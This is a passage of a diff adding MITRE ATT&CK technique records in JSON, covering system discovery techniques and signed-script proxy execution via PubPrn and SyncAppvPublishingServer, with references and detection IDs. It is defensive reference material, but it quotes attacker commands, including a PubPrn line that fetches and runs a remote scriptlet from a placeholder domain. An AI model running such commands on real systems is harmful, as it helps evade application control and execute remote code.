+                            "url": "https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft Azure Instance Metadata 2021",
+                            "description": "Microsoft. (2021, February 21). Azure Instance Metadata Service (Windows). Retrieved April 2, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows"
+                        },
+                        {
+                            "source_name": "Sophos Geolocation 2016",
+                            "description": "Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals target you based on where you live. Retrieved April 1, 2021.",
+                            "url": "https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Pooja Natarajan, NEC Corporation India",
+                        "Hiroki Nagahama, NEC Corporation",
+                        "Manikantan Srinivasan, NEC Corporation India",
+                        "Wes Hurd",
+                        "Katie Nickels, Red Canary"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2025-10-24 17:49:22.536000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0043: Detection Strategy for System Location Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-08-18 14:06:45.244000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "System Language Discovery",
+                    "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language</code> or parsing the outputs of Windows API functions <code>GetUserDefaultUILanguage</code>, <code>GetSystemDefaultUILanguage</code>, <code>GetKeyboardLayoutList</code> and <code>GetUserDefaultLangID</code>.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelg\u00e4nging May 2018)\n\nOn a macOS or Linux system, adversaries may query <code>locale</code> to retrieve the value of the <code>$LANG</code> environment variable.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1614/001",
+                            "external_id": "T1614.001"
+                        },
+                        {
+                            "source_name": "Darkside Ransomware Cybereason",
+                            "description": "Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.",
+                            "url": "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware"
+                        },
+                        {
+                            "source_name": "Securelist JSWorm",
+                            "description": "Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.",
+                            "url": "https://securelist.com/evolution-of-jsworm-ransomware/102428/"
+                        },
+                        {
+                            "source_name": "CrowdStrike Ryuk January 2019",
+                            "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.",
+                            "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"
+                        },
+                        {
+                            "source_name": "SecureList SynAck Doppelg\u00e4nging May 2018",
+                            "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelg\u00e4nging technique. Retrieved May 22, 2018.",
+                            "url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/"
+                        },
+                        {
+                            "source_name": "Malware System Language Check",
+                            "description": "Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. Retrieved August 18, 2021.",
+                            "url": "https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Harshal Tupsamudre, Qualys"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2025-10-24 17:49:20.039000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0565: Detection Strategy for System Language Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:27.342000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "System Network Configuration Discovery",
+                    "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1016",
+                            "external_id": "T1016"
+                        },
+                        {
+                            "source_name": "Mandiant APT41 Global Intrusion ",
+                            "description": "Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.",
+                            "url": "https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits"
+                        },
+                        {
+                            "source_name": "Trellix Rnasomhouse 2024",
+                            "description": "Pham Duy Phuc, Max Kersten, No\u00ebl Keijzer, and Micha\u00ebl Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025.",
+                            "url": "https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2025-10-24 17:48:56.618000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.7",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0195: Behavioral Detection of System Network Configuration Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:45.139000+00:00",
+                    "modified": "2026-05-12 15:12:00.652000+00:00",
+                    "name": "System Network Connections Discovery",
+                    "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to \"net session\". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, the command `esxi network ip connection list` can be used to list active network connections.(Citation: Sygnia ESXi Ransomware 2025)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1049",
+                            "external_id": "T1049"
+                        },
+                        {
+                            "source_name": "Amazon AWS VPC Guide",
+                            "description": "Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019.",
+                            "url": "https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html"
+                        },
+                        {
+                            "source_name": "Microsoft Azure Virtual Network Overview",
+                            "description": "Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). What is Azure Virtual Network?. Retrieved October 6, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview"
+                        },
+                        {
+                            "source_name": "Google VPC Overview",
+                            "description": "Google. (2019, September 23). Virtual Private Cloud (VPC) network overview. Retrieved October 6, 2019.",
+                            "url": "https://cloud.google.com/vpc/docs/vpc"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        },
+                        {
+                            "source_name": "Sygnia ESXi Ransomware 2025",
+                            "description": "Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.",
+                            "url": "https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian",
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.652000+00:00\", \"old_value\": \"2025-10-24 17:49:01.094000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.5",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0320: Detection of System Network Connections Discovery Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:35.733000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "System Owner/User Discovery",
+                    "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1033",
+                            "external_id": "T1033"
+                        },
+                        {
+                            "source_name": "show_ssh_users_cmd_cisco",
+                            "description": "Cisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html"
+                        },
+                        {
+                            "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018",
+                            "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2025-10-24 17:48:20.366000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.6",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0093: Behavioral Detection of User Discovery via Local and Remote Enumeration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "System Script Proxy Execution",
+                    "description": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1216",
+                            "external_id": "T1216"
+                        },
+                        {
+                            "source_name": "GitHub Ultimate AppLocker Bypass List",
+                            "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.",
+                            "url": "https://github.com/api0cradle/UltimateAppLockerByPassList"
+                        },
+                        {
+                            "source_name": "LOLBAS Project",
+                            "description": "Oddvar Moe et al. (2022, February).  Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.",
+                            "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian",
+                        "Wes Hurd"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2026-04-15 22:42:22.297000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0466: Detection of Script-Based Proxy Execution via Signed Microsoft Utilities"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-03 16:49:57.788000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "PubPrn",
+                    "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1216/001",
+                            "external_id": "T1216.001"
+                        },
+                        {
+                            "source_name": "pubprn",
+                            "description": "Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn"
+                        },
+                        {
+                            "source_name": "Enigma0x3 PubPrn Bypass",
+                            "description": "Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.",
+                            "url": "https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Atul Nair, Qualys"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-15 22:42:36.777000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0528: Detecting Remote Script Proxy Execution via PubPrn.vbs"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-02-06 16:20:41.647000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "SyncAppvPublishingServer",
+                    "description": "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)\n    \nThe SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)\n\nAdversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by \"living off the land.\"(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)\n\nFor example,  [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv)\n\n`SyncAppvPublishingServer.vbs \"n; {PowerShell}\"`",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1216/002",
+                            "external_id": "T1216.002"
+                        },
+                        {
+                            "source_name": "4 - appv",
+                            "description": "John Fokker. (2022, March 17). Suspected DarkHotel APT activity update. Retrieved February 6, 2024.",
+                            "url": "https://www.trellix.com/en-ca/about/newsroom/stories/research/suspected-darkhotel-apt-activity-update/"
+                        },
+                        {
+                            "source_name": "2 - appv",
+                            "description": "Microsoft. (2022, November 3). Getting started with App-V for Windows client. Retrieved February 6, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/windows/application-management/app-v/appv-getting-started"
+                        },
+                        {
+                            "source_name": "5 - appv",
+                            "description": "Nick Landers, Casey Smith. (n.d.). /Syncappvpublishingserver.vbs. Retrieved February 6, 2024.",
+                            "url": "https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"
+                        },
+                        {
+                            "source_name": "7 - appv",
+                            "description": "Nick Landers. (2017, August 8). Need a signed alternative to Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered.. Retrieved September 12, 2024.",
+                            "url": "https://x.com/monoxgas/status/895045566090010624"
+                        },
+                        {
+                            "source_name": "3 - appv",
+                            "description": "Raj Chandel. (2022, March 17). Indirect Command Execution: Defense Evasion (T1202). Retrieved February 6, 2024.",
+                            "url": "https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/"
+                        },
+                        {
+                            "source_name": "1 - appv",
+                            "description": "SEONGSU PARK. (2022, December 27). BlueNoroff introduces new methods bypassing MoTW. Retrieved February 6, 2024.",
+                            "url": "https://securelist.com/bluenoroff-methods-bypass-motw/108383/"
+                        },
+                        {
+                            "source_name": "6 - appv",
+                            "description": "Strontic. (n.d.). SyncAppvPublishingServer.exe. Retrieved February 6, 2024.",
+                            "url": "https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Shaul Vilkomir-Preisman"
+                    ],
+                    "x_mitre_deprecated": false,
